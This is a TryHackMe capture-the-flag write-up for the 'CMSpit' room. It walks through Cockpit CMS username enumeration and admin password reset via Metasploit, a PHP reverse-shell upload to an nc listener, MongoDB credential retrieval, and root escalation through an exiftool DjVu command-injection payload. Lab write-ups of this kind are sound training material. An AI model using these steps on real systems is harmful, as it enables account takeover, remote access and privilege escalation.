7 August 2021 / TRYHACKME, CTF, MEDIUM CMSpit Write Up Overview cmspit is a medium rated CTF room on TryHackMe. This was a good machine highlighting recent CVE’s, thanks stuxnet. Nmap Although not required I added a entry in my hosts file with the machine IP to cmspit.thm. Once added I started a nmap scan to check for available ports. └──╼ $sudo nmap -sC -sV -oA nmap/initial cmspit.thm Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-08 11:11 BST Nmap scan report for cmspit.thm (10.10.34.218) Host is up (0.035s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 7f:25:f9:40:23:25:cd:29:8b:28:a9:d9:82:f5:49:e4 (RSA) | 256 0a:f4:29:ed:55:43:19:e7:73:a7:09:79:30:a8:49:1b (ECDSA) |_ 256 2f:43:ad:a3:d1:5b:64:86:33:07:5d:94:f9:dc:a4:01 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) | http-title: Authenticate Please! |_Requested resource was /auth/login?to=/ |_http-trane-info: Problem with XML parsing of /evox/about Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.50 seconds 2 Ports open: 22 - SSH - OpenSSH 7.2p2 80 - HTTP - Apache 2.4.18 I ran a full port scan but no additional ports were found. Enumeration Clearly this is going to be a web challenge, while I poked around the website I wanted some enumeration going on in the background so started Gobuster and Nikto. └──╼ $gobuster dir -u cmspit.thm -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://cmspit.thm [+] Threads: 10 [+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/08/08 11:16:09 Starting gobuster =============================================================== Error: the server returns a status code that matches the provided options for non existing urls. http://cmspit.thm/fbaebb24-03e7-4123-b75f-01915dfcbf6b => 302. To force processi ng of Wildcard responses, specify the '--wildcard' switch However is looks like all requests are being sent to ‘http://cmspit.thm/auth/login?to=/’ However, I did have some more luck with Nikto. └──╼ $nikto -h cmspit.thm - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.34.218 + Target Hostname: cmspit.thm + Target Port: 80 + Start Time: 2021-08-08 11:18:16 (GMT1) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + Cookie 8071dec2be26139e39a170762581c00f created without the httponly flag + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Root page / redirects to: /auth/login?to=/ + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + OSVDB-3233: /icons/README: Apache default file found. + Retrieved access-control-allow-origin header: * + /server-status: Apache server-status interface found (protected/forbidden) + /composer.json: PHP Composer configuration file reveals configuration information - https://getcomposer.org/ + /package.json: Node.js package file found. It may contain sensitive information. + 7789 requests: 3 error(s) and 10 item(s) reported on remote host + End Time: 2021-08-08 11:25:02 (GMT1) (406 seconds) --------------------------------------------------------------------------- + 1 host(s) tested I went to http://cmspit.thm/ which redirected me to http://cmspit.thm/auth/login?to=/. I tried some basic username and password combinations but nothing worked. From the logo and name on the authentication page, its clear we are working with Cockpit CMS. I checked the source code and found the version 0.11.1. This was also confirmed by going to http://cmspit.thm/package.json found via Nikto. I googled ‘cockpit cms 0.11.1 exploit’ and found a great blog by Nikita Petrov, however im lazy and also found a metasploit module. msf6 > search cockpit Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/cockpit_cms_rce 2021-04-13 normal Yes Cockpit CMS NoSQLi to RCE Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/cockpit_cms_rce msf6 > I selected the module using the command ‘use 0’ and filled out the options. msf6 exploit(multi/http/cockpit_cms_rce) > show options Module options (exploit/multi/http/cockpit_cms_rce): Name Current Setting Required Description ---- --------------- -------- ----------- ENUM_USERS true no Enumerate users Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS cmspit.thm yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The URI of Cockpit USER no User account to take over VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST tun0 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target msf6 exploit(multi/http/cockpit_cms_rce) > I ran the module and was able to find 4 users, however the module then failed as a user was required. msf6 exploit(multi/http/cockpit_cms_rce) > run [*] Started reverse TCP handler on <Local Machine>:4444 [*] Attempting Username Enumeration (CVE-2020-35846) [+] Found users: ["admin", "darkStar7471", "skidy", "ekoparty"] [-] Exploit aborted due to failure: bad-config: cmspit.thm:80 - User to exploit required [*] Exploit completed, but no session was created. msf6 exploit(multi/http/cockpit_cms_rce) > I set user to admin and ran the module again. msf6 exploit(multi/http/cockpit_cms_rce) > set user admin user => admin msf6 exploit(multi/http/cockpit_cms_rce) > run [*] Started reverse TCP handler on <Local Machine>:4444 [*] Attempting Username Enumeration (CVE-2020-35846) [+] Found users: ["admin", "darkStar7471", "skidy", "ekoparty"] [*] Obtaining reset tokens (CVE-2020-35847) [+] Found tokens: ["rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23"] [*] Checking token: rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23 [*] Obtaining user info [*] user: admin [*] name: Admin [*] email: admin@yourdomain.de [*] active: true [*] group: admin [*] password: <REDACTED> [*] i18n: en [*] _created: 1621655201 [*] _modified: 1621655201 [*] _id: 60a87ea165343539ee000300 [*] _reset_token: rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23 [*] md5email: a11eea8bf873a483db461bb169beccec [+] Changing password to <REDACTED> [+] Password update successful [*] Attempting login [-] Exploit failed: ArgumentError wrong number of arguments (given 3, expected 1..2) [*] Exploit completed, but no session was created. msf6 exploit(multi/http/cockpit_cms_rce) > The exploit failed again however it was able to change the admin password. I went back to the login page and was able to log in as admin. Initial Access In the blog post, RCE was possible by uploading a PHP script via the finder directory so I went to cmspit.thm/finder I copied a PHP reverse shell script to my directory. └──╼ $cp /usr/share/webshells/php/php-reverse-shell.php . ┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit] └──╼ $mv php-reverse-shell.php shell.php ┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit] I updated the script with my tun0 IP and port of 4444 and started a nc listener with the command nc -nvlp 4444. On the webpage I clicked the upload button and selected my shell.php file. Now going to ‘http://cmspit.thm/shell.php’ I get a shell! Priv Esc Now I have a shell as www-data I want to escalate my privileges. I enumerated the machine and noticed Mongodb was listening on TCP port 27017. Proto Recv-Q Send-Q Local Address Foreign Address State Timer tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN off (0.00/0/0) tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0) tcp6 0 0 :::80 :::* LISTEN off (0.00/0/0) tcp6 0 0 :::22 :::* LISTEN off (0.00/0/0) I connected to the mongodb service and was able to find the credentials for the user ‘stux’. $ mongo 127.0.0.1:27017 MongoDB shell version: 2.6.10 connecting to: 127.0.0.1:27017/test show dbs admin (empty) local 0.078GB sudousersbak 0.078GB use sudousersbak show collections switched to db sudousersbak flag system.indexes user db.user.find() { "_id" : ObjectId("60a89d0caadffb0ea68915f9"), "name" : "<REDACTED>" } { "_id" : ObjectId("60a89dfbaadffb0ea68915fa"), "name" : "stux" } I used the credentials to SSH to the machine and ran the command ‘sudo -l’. └──╼ $ssh stux@cmspit.thm stux@cmspit.thm's password: Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage Last login: Sat May 22 19:41:38 2021 from 192.168.85.1 stux@ubuntu:~$ sudo -l Matching Defaults entries for stux on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User stux may run the following commands on ubuntu: (root) NOPASSWD: /usr/local/bin/exiftool stux@ubuntu:~$ The user stux can run the command /usr/local/bin/exiftool as root with out the root password. Normally, I would now go to GTFObins to look for a priv esc, however the room questions indicate a CVE vulnerability so I googled ‘exiftools CVE’ and found this blog. In the blog it details the steps of how to exploit the vulnerability which is: $ sudo apt install djvulibre-bin $ bzz payload payload.bzz $ djvumake exploit.djvu INFO=’1,1’ BGjp=/dev/null ANTz=payload.bzz Back on my local machine, I created a payload file with the following contents (metadata "\c${system('/bin/bash')};"), then followed the steps above. ┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit] └──╼ $cat payload (metadata "\c${system('/bin/bash')};") ┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit] └──╼ $sudo apt install djvulibre-bin Reading package lists... Done Building dependency tree Reading state information... Done djvulibre-bin is already the newest version (3.5.28-2). The following packages were automatically installed and are no longer required: gdal-data libaec0 libarmadillo9 libarpack2 libboost-locale1.67.0 libcfitsio8 libcharls2 libdap25 libdapclient6v5 libepsilon1 libfreexl1 libfyba0 libgdal26 libgeos-3.8.1 libgeos-c1v5 libgeotiff5 libgfapi0 libgfrpc0 libgfxdr0 libglusterfs0 libhdf4-0-alt libhdf5-103 libkmlbase1 libkmldom1 libkmlengine1 libnetcdf15 libogdi4.1 liborcus-0.15-0 liborcus-parser-0.15-0 libproj19 libpython3.7-minimal libpython3.7-stdlib libpython3.8-dev libqhull7 libspatialite7 libsuperlu5 libsz2 liburiparser1 libxerces-c3.2 odbcinst odbcinst1debian2 proj-bin proj-data python3-gridfs python3.7 python3.7-minimal python3.8-dev Use 'sudo apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 2541 not upgraded. ┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit] └──╼ $bzz payload payload.bzz ┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit] └──╼ $djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz ┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit] └──╼ $ls -la exploit.djvu -rw-r--r-- 1 daz daz 92 Aug 8 12:13 exploit.djvu ┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit] └──╼ $ Finaly I started a Python webserver with the command sudo python3 -m http.server 80. Next back on cmspit machine I downloaded the exploit.djvu file with wget and ran the exif tool as sudo against the exploit file and got root! stux@ubuntu:~$ wget http://<Local Machine>/exploit.djvu --2021-08-08 04:16:42-- http://<Local Machine>/exploit.djvu Connecting to <Local Machine>:80... connected. HTTP request sent, awaiting response... 200 OK Length: 92 [image/vnd.djvu] Saving to: ‘exploit.djvu’ exploit.djvu 100%[===========================================================================================>] 92 --.-KB/s in 0s 2021-08-08 04:16:42 (17.8 MB/s) - ‘exploit.djvu’ saved [92/92] stux@ubuntu:~$ sudo /usr/local/bin/exiftool exploit.djvu root@ubuntu:~# whoami root root@ubuntu:~# hostname Thanks for reading! ============================================================ Any comments or feedback welcome! You can find me on twitter.